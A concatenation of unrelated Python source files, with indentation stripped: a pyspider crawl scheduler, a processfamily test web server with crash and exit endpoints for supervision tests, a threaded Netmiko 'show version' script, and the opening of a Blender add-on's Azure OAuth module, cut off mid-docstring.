"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
'''comsume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
self.xmlrpc_ioloop.start()
def on_request(self, task):
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request is arrived'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a crawled task is arrived'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
# when a task is in processing, the modify may conflict with the running task.
# postpone the modify after task finished.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_status(self, task):
'''Called when a status pack is arrived'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task is done and success, called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
logger.info('task done %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_failed(self, task):
'''Called when a task is failed, called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
return task
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
# inject informations about project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler Mixin class for one mode
overwirted send_task method
call processor.on_task(fetcher.fetch(task)) instead of consuming queue
"""
def _check_select(self):
"""
interactive mode of select tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl given url, same parameters as BaseHandler.crawl
url - url or taskid, parameters will be used if in taskdb
project - can be ignored if only one project exists.
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
raise LookupError('You need specify the project: %r'
% list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
type, task, response = result.args
self.processor.on_task(task, response)
# do with message
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# do with results
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
raise self.outqueue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
|
FunkyWebServer.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from builtins import object
from future.utils import PY2
__author__ = 'matth'
import http.server
import socketserver
import urllib.parse
import argparse
from processfamily.test import Config
import logging
import logging.handlers
import threading
import _thread
import os
from types import CodeType
import json
import sys
import ctypes
from processfamily import _traceback_str
import select
import errno
import socket
if sys.platform.startswith('win'):
import win32job
import win32api
else:
from .. import ctypes_prctl as prctl
def crash():
"""
crash the Python interpreter...
see https://wiki.python.org/moin/CrashingPython
"""
exec(CodeType(0, 5, 8, 0, "hello moshe", (), (), (), "", "", 0, ""))
if sys.platform.startswith('win'):
#Using a PyDLL here instead of a WinDLL causes the GIL to be acquired:
_kernel32 = ctypes.PyDLL('kernel32.dll')
def hold_gil(timeout):
try:
logging.info("Stealing GIL for %ss", timeout)
_kernel32.Sleep(timeout*1000)
logging.info("Released GIL")
except ValueError as e:
#This happens because it does some sneaky checking of things at the end of the
#function call and notices that it has been tricked in to using the wrong calling convention
#(because we are using PyDLL instead of WinDLL)
#See http://python.net/crew/theller/ctypes/tutorial.html#calling-functions
pass
else:
_libc = ctypes.PyDLL('libc.so.6')
def hold_gil(timeout):
#Using a PyDLL here instead of a CDLL causes the GIL to be acquired:
logging.info("Stealing GIL for %ss", timeout)
_libc.sleep(timeout)
logging.info("Released GIL")
class MyHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
funkyserver = None
http_server = None
def do_GET(self):
"""Serve a GET request."""
parsed_url = urllib.parse.urlparse(self.path)
params = urllib.parse.parse_qs(parsed_url.query)
path = parsed_url.path
if path.startswith('/stop'):
# stop children before we return a response
timeout = int((params.get("timeout", []) or ["30"])[0])
self.funkyserver.pre_stop(timeout=timeout)
t = self.get_response_text()
if self.send_head(t):
self.wfile.write(t)
#I preempt the finish operation here so that processing of this request is all done before we crash or whatever:
self.finish()
self.http_server.shutdown_request(self.connection)
if path.startswith('/crash'):
crash()
if path.startswith('/stop'):
self.funkyserver.stop()
if path.startswith('/interrupt_main'):
_thread.interrupt_main()
if path.startswith('/exit'):
os._exit(1)
if path.startswith('/hold_gil'):
t = int((params.get("t", []) or ["100"])[0])
hold_gil(t)
def do_HEAD(self):
"""Serve a HEAD request."""
self.send_head(self.get_response_text())
def get_response_text(self):
return self._to_json_rsp(self.get_response_object())
def get_response_object(self):
if self.path.startswith('/injob'):
return json.dumps(win32job.IsProcessInJob(win32api.GetCurrentProcess(), None), indent=3)
if self.path.startswith('/job'):
extended_info = win32job.QueryInformationJobObject(None, win32job.JobObjectExtendedLimitInformation)
return json.dumps(extended_info, indent=3)
if self.path.startswith('/close_file_and_delete_it'):
try:
if self.funkyserver._open_file_handle is not None:
f = os.path.join(os.path.dirname(__file__), 'tmp', 'testfile.txt')
logging.info("Closing test file handle")
self.funkyserver._open_file_handle.close()
self.funkyserver._open_file_handle = None
assert os.path.exists(f)
os.remove(f)
assert not os.path.exists(f)
return "OK"
except Exception as e:
logging.error("Failed to close file handle and delete file: %s\n%s", e, _traceback_str())
return "FAIL"
if self.path.startswith('/stop'):
logging.info("Returning child_processes_terminated: %r", self.funkyserver.child_processes_terminated)
return repr(self.funkyserver.child_processes_terminated)
return "OK"
def _to_json_rsp(self, o):
return json.dumps(o, indent=3).encode('utf-8')
def send_head(self, content):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
"""
if self.path.lower().startswith('/favicon'):
self.send_error(404, "File not found")
return False
self.send_response(200)
self.send_header("Content-type", "application/json; charset=utf-8")
self.send_header("Connection", "close")
self.end_headers()
return True
def log_message(self, format, *args):
"""Log an arbitrary message.
This is used by all other logging functions. Override
it if you have specific logging wishes.
The first argument, FORMAT, is a format string for the
message to be logged. If the format string contains
any % escapes requiring parameters, they should be
specified as subsequent arguments (it's just like
printf!).
The client ip address and current date/time are prefixed to every
message.
"""
logging.info("%s - - " + format, self.client_address[0], *args)
class MyHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
def __init__(self, port):
MyHTTPRequestHandler.http_server = self
http.server.HTTPServer.__init__(self, ("", port), MyHTTPRequestHandler)
def handle_error(self, request, client_address):
logging.error('Exception happened during processing of request from %s:\n%s', client_address, _traceback_str())
class FunkyWebServer(object):
_open_file_handle = None
def __init__(self):
self.parse_args_and_setup_logging()
self.port = Config.get_starting_port_nr() + self.process_number
MyHTTPRequestHandler.funkyserver = self
self.httpd_lock = threading.RLock()
self.httpd = None
self.child_processes_terminated = None
@classmethod
def parse_args_and_setup_logging(cls):
arg_parser = argparse.ArgumentParser(description='FunkyWebServer')
arg_parser.add_argument('--process_number', type=int)
arg_parser.add_argument('--num_children', type=int)
args = arg_parser.parse_args()
cls.process_number = args.process_number or 0
logsdir = os.path.join(os.path.dirname(__file__), 'tmp', 'logs')
if not os.path.exists(logsdir):
os.makedirs(logsdir)
logFormatter = logging.Formatter('%(asctime)s %(message)s')
loghandler = logging.handlers.TimedRotatingFileHandler(os.path.join(logsdir, "process-%02d-log.txt" % cls.process_number), when="midnight")
loghandler.setFormatter(logFormatter)
logger = logging.getLogger()
logger.addHandler(loghandler)
if not sys.platform.startswith('win'):
if cls.process_number > 0:
prctl.set_name(b'python-pfchild')
else:
prctl.set_name(b'python-pfparent')
cls.num_children = args.num_children or 3
if cls._open_file_handle is None and cls.process_number == 0:
logging.info("Opening a file and keeping it open")
cls._open_file_handle = open(os.path.join(os.path.dirname(__file__), 'tmp', 'testfile.txt'), 'w')
# The tests expect file descriptors to be inheritable, but from Python 3.4 onwards, file descriptors
# are set to be not inheritable by default.
if not PY2:
os.set_inheritable(cls._open_file_handle.fileno(), True)
def run(self):
with self.httpd_lock:
self.httpd = MyHTTPServer(self.port)
logging.info("Process %d listening on port %d", self.process_number, self.port)
self.httpd.serve_forever(poll_interval=0.1)
logging.info("Process %d finished listening on port %d", self.process_number, self.port)
def pre_stop(self, timeout=30):
try:
if hasattr(self, 'family'):
logging.info("Stopping family...")
self.child_processes_terminated = terminated = self.family.stop(timeout=timeout)
if terminated:
logging.info("Had to terminate %d child processes", terminated)
else:
logging.info("Didn't have to terminate child processes, they stopped gracefully")
except Exception as e:
self.child_processes_terminated = e
logging.error("Error terminating child processes: %r", e)
def stop(self):
with self.httpd_lock:
if self.httpd:
logging.info("Shutting down httpd (in separate thread)")
threading.Thread(name="shutdown", target=self.shutdown_httpd).start()
def shutdown_httpd(self):
try:
with self.httpd_lock:
logging.info("Shutting down httpd")
self.httpd.shutdown()
logging.info("Shut down httpd")
self.httpd = None
finally:
if self._open_file_handle is not None:
logging.info("Closing test file handle")
self._open_file_handle.close()
|
threads_netmiko.py | #!/usr/bin/env python
import threading
from datetime import datetime
from netmiko import ConnectHandler
from my_devices import device_list as devices
def show_version(a_device):
"""Execute show version command using Netmiko."""
remote_conn = ConnectHandler(**a_device)
print()
print("#" * 80)
print(remote_conn.send_command_expect("show version"))
print("#" * 80)
print()
def main():
"""
Use threads and Netmiko to connect to each of the devices. Execute
'show version' on each device. Record the amount of time required to do this.
"""
start_time = datetime.now()
for a_device in devices:
my_thread = threading.Thread(target=show_version, args=(a_device,))
my_thread.start()
main_thread = threading.currentThread()
for some_thread in threading.enumerate():
if some_thread != main_thread:
print(some_thread)
some_thread.join()
print("\nElapsed time: " + str(datetime.now() - start_time))
if __name__ == "__main__":
main()
|
auth.py | #-------------------------------------------------------------------------
#
# Batch Apps Blender Addon
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#--------------------------------------------------------------------------
import bpy
import webbrowser
import logging
import threading
from http.server import HTTPServer
from urllib.parse import unquote
from batchapps_blender.utils import (
BatchAppsOps,
OAuthRequestHandler)
from batchapps_blender.ui import ui_auth
from batchapps_blender.props import props_auth
from batchapps import AzureOAuth
from batchapps.exceptions import (
AuthenticationException,
InvalidConfigException)
TIMEOUT = 60 # 1 minute
class BatchAppsAuth(object):
"""
Managers authentication of the session for the BatchApps Blender Addon.
Will attempt to sign in automatically based on data available in the
Batch Apps configuration. If unsuccessful, will prompt use to sign in
via a web browser.
"""
pages = ["LOGIN", "REDIRECT"]
def __init__(self):
self.ops = self._register_ops()
self.props = self._register_props()
self.ui = self._register_ui()
def display(self, ui, layout):
"""
Invokes the corresponding ui function depending on the session's
current page.
:Args:
- ui (blender :class:`.Interface`): The instance of the Interface
panel class.
- layout (blender :class:`bpy.types.UILayout`): The layout object,
derived from the Interface panel. Used for creating ui
components.
:Returns:
- Runs the display function for the applicable page.
"""
return self.ui[bpy.context.scene.batchapps_session.page](ui, layout)
def _register_props(self):
"""
Registers and retrieves the auth property objects.
These properties are assigned to the scene.batchapps_auth context.
:Returns:
- :class:`.AuthProps`
"""
props = props_auth.register_props()
return props
def _register_ops(self):
"""
Registers each auth operator with a batchapps_auth prefix.
:Returns:
- A list of the names (str) of the registered auth operators.
"""
ops = []
ops.append(BatchAppsOps.register("auth.login",
"Login",
self._login))
ops.append(BatchAppsOps.register("auth.logout",
"Logout",
self._logout))
ops.append(BatchAppsOps.register("auth.redirect",
"Redirecting authentication",
modal=self._redirect_modal,
invoke=self._redirect_invoke,
_timer=None))
return ops
def _register_ui(self):
"""
Matches the login and redirection pages with their corresponding
ui functions.
:Returns:
- A dictionary mapping the page name to its corresponding
ui function.
"""
def get_auth_ui(name):
name = name.lower()
return getattr(ui_auth, name)
page_func = map(get_auth_ui, self.pages)
return dict(zip(self.pages, page_func))
def _redirect_modal(self, op, context, event):
"""
The modal method for the auth.redirect operator to handle running
the authentication redirection server in a separate thread to
prevent the blocking of the Blender UI.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
- event (:class:`bpy.types.Event`): The blender invocation event.
:Returns:
- If the thread has completed, the Blender-specific value
{'FINISHED'} to indicate the operator has completed its action.
- Otherwise the Blender-specific value {'RUNNING_MODAL'} to
indicate the operator wil continue to process after the
completion of this function.
"""
if event.type == 'TIMER':
context.scene.batchapps_session.log.debug("AuthThread complete.")
if not self.props.thread.is_alive():
context.window_manager.event_timer_remove(op._timer)
return {'FINISHED'}
return {'RUNNING_MODAL'}
def _redirect_invoke(self, op, context, event):
"""
The invoke method for the auth.redirect operator.
Starts the authentication redirect thread.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
- event (:class:`bpy.types.Event`): The blender invocation event.
:Returns:
- Blender-specific value {'RUNNING_MODAL'} to indicate the operator
wil continue to process after the completion of this function.
"""
self.props.thread.start()
context.scene.batchapps_session.log.debug("AuthThread initiated.")
context.window_manager.modal_handler_add(op)
op._timer = context.window_manager.event_timer_add(1, context.window)
return {'RUNNING_MODAL'}
def _login(self, op, context, *args):
"""
The execute method for the auth.login operator.
Sets the functions to per performed by the authentication thread and
updates the session page to "REDIRECT" while the thread executes.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
:Returns:
- Blender-specific value {'FINISHED'} to indicate the operator has
completed its action.
"""
auth_thread = lambda: BatchAppsOps.session(self.web_authentication)
self.props.thread = threading.Thread(name="AuthThread",
target=auth_thread)
bpy.ops.batchapps_auth.redirect('INVOKE_DEFAULT')
if context.scene.batchapps_session.page == "LOGIN":
context.scene.batchapps_session.page = "REDIRECT"
return {'FINISHED'}
def _logout(self, op, context, *args):
"""
The execute method for the auth.logout operator.
Clears any cached credentials and resets the session page back to the
Login screen.
:Args:
- op (:class:`bpy.types.Operator`): An instance of the current
operator class.
- context (:class:`bpy.types.Context`): The current blender
context.
:Returns:
- Blender-specific value {'FINISHED'} to indicate the operator has
completed its action.
"""
if self.props.credentials:
try:
self.props.credentials.clear_auth()
except OSError:
pass
self.props.credentials = None
bpy.context.scene.batchapps_session.page = "LOGIN"
bpy.context.scene.batchapps_session.log.info(
"Logged out. Cached sessions cleared.")
return {'FINISHED'}
def auto_authentication(self, cfg, log):
"""
Attempts to authenticate automatically by first searching the Batch Apps
configuration for an unattended session, then a cached session.
:Args:
- cfg (:class:`batchapps.Configuration`): An instance of the Batch
Apps Configuration class, read from the file set in the addon
User Preferences.
